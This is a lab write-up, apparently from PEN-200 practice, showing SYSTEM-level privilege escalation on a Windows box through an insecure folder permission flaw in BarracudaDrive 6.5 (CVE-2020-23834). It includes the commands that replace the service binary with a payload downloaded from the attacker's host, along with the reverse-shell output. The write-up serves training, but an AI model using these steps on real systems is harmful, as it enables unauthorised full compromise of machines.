CVE-2020-23834
The target BarracudaDrive instance has been identified to be vulnerable to CVE-2020-23834 due to its outdated version; 6.5
A vulnerability classified as critical was found in Real Time Logic BarracudaDrive 6.5. Affected by this vulnerability is an unknown functionality of the file SYSTEMDRIVE%\bd\bd.exe of the component File Permission. The manipulation leads to privileges management. This vulnerability is known as CVE-2020-23834. Attacking locally is a requirement. There is no exploit available.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ searchsploit -m windows/local/48789.txt ; mv 48789.txt CVE-2020-23834.txt
Exploit: BarracudaDrive v6.5 - Insecure Folder Permissions
URL: https://www.exploit-db.com/exploits/48789
Path: /usr/share/exploitdb/exploits/windows/local/48789.txt
Codes: N/A
Verified: False
File Type: C source, ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/medjed/48789.txt
Exploit locally available
Exploitation
PS C:\bd> mv bd.exe bd.exe.bak
Changing the service EXE to a new name; bd.exe.bak
PS C:\bd> iwr -Uri http://192.168.45.195/bd.exe -OutFile C:\bd\bd.exe
Transferring the payload
PS C:\bd> shutdown /r
Rebooting the target system with the current user’s privileges
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.156.127] 49671
Windows PowerShell running as user MEDJED$ on MEDJED
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
medjed
PS C:\WINDOWS\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.156.127
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.156.254
System level compromise